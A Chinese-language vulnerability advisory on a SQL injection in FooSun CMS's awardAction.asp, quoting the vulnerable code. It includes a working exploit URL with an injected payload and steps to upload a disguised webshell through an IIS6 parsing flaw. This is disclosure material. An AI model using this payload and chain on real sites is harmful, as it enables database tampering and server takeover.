风讯网站管理系统awardAction.asp页面存在SQL注入

影响版本:
FooSun > 5.0

程序介绍:

FoosunCMS是一款具有强大的功能的基于ASP+ACCESS/MSSQL构架的内容管理软件。

漏洞分析:

 

在文件\User\award\awardAction.asp中:
 
Integral=NoSqlHack(request.QueryString("Integral")) //第14行
 
if action="join" then
 
User_Conn.execute("Insert into FS_ME_User_Prize (prizeid,usernumber,awardID) values("&CintStr(prizeID)&",’"&session("FS_UserNumber")&"’,"&CintStr(awardID)&")")
 
‘获得当前参加人数——————————–
 
User_Conn.execute("Update FS_ME_Users set Integral=(Integral-"&Integral&") where usernumber=’"&session("FS_UserNumber")&"’")
 
数字变量Integral使用过滤字符的函数过滤导致sql注入漏洞的产生,导致可以修改表FS_ME_User的任意内容,配合系统的其他功能可以拿到webshell

漏洞利用:

 

注册用户登陆后,访问Url:
 
http://wavdb.com/User/award/awardAction.asp?action=join&awardID=1&prizeID=1&Integral=0),usernumber= 0x6C006C002E00610073007000,LoginNum=(1
 

退出后再登陆,在文件管理处上传后缀为doc的webshell就可以拿到webshell。(利用IIS6对文件夹为*.asp的解析漏洞) 

解决方案:
厂商补丁:
FooSun
——-
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.foosun.net/

信息来源:
<*来源: Bug.Center.Team
链接: http://wavdb.com/vuln/1672
*>

发表评论?

0 条评论。

发表评论